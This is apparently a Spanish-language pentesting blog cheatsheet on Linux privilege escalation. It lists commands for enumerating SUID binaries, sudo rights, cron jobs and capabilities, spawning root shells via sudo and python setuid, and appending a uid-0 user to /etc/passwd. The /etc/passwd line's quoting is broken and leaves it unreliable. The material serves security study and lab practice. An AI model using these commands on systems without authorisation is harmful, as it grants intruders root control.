Mmatoriusbig_
ONLINEUPTIME 99.98%LAST_BUILD 20.04.2026 · 14:22 UTC
v2.0 · matoriusbig.me
HOME/CHEATSHEETS/LINUX PRIVESC · CHEATSHEET
CHEATSHEET8 MIN5,698DIFF · MEDIUM

Linux PrivEsc · Cheatsheet

Checklist operativo de escalada de privilegios en Linux: SUID, cron, capabilities, sudo.

#linux#privesc#suid#capabilities
LNX

Reconocimiento inicial

# Info del sistema
id && uname -a && cat /etc/os-release

# Procesos y servicios
ps aux | grep root
ss -tlnp

# Variables de entorno
env

SUID / SGID

# Buscar binarios SUID
find / -perm -4000 -type f 2>/dev/null

# Buscar binarios SGID
find / -perm -2000 -type f 2>/dev/null
[ TIP ]
Consultar GTFOBins para explotar binarios SUID comunes como find, vim, python.

Sudo

# Ver permisos sudo del usuario actual
sudo -l

# Explotar si sudo permite ejecutar bash
sudo bash

# Explotar si sudo permite python
sudo python3 -c 'import os; os.system("/bin/bash")'

Cron Jobs

# Ver cron jobs del sistema
cat /etc/crontab
ls -la /etc/cron.*
crontab -l

# Monitorear cron jobs en tiempo real
pspy64  # herramienta externa

Capabilities

# Buscar binarios con capabilities
getcap -r / 2>/dev/null

# Explotar python con cap_setuid
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

Writable Files

# Archivos escribibles por el usuario actual
find / -writable -type f 2>/dev/null | grep -v proc

# /etc/passwd escribible
echo 'root2:$(openssl passwd hacked):0:0:root:/root:/bin/bash' >> /etc/passwd
su root2
[ DANGER ]
Modificar /etc/passwd en un entorno real es altamente detectado. Usar solo en labs controlados.

Conclusión

El flujo estándar es: reconocimiento → sudo → SUID → cron → capabilities → writables. Herramientas como LinPEAS automatizan este proceso pero entender cada vector manualmente es esencial.

COMPARTIR ESTE POST
Compartir
// COMENTARIOS · GISCUS
Los comentarios se sincronizan con GitHub Discussions. Inicia sesión con GitHub →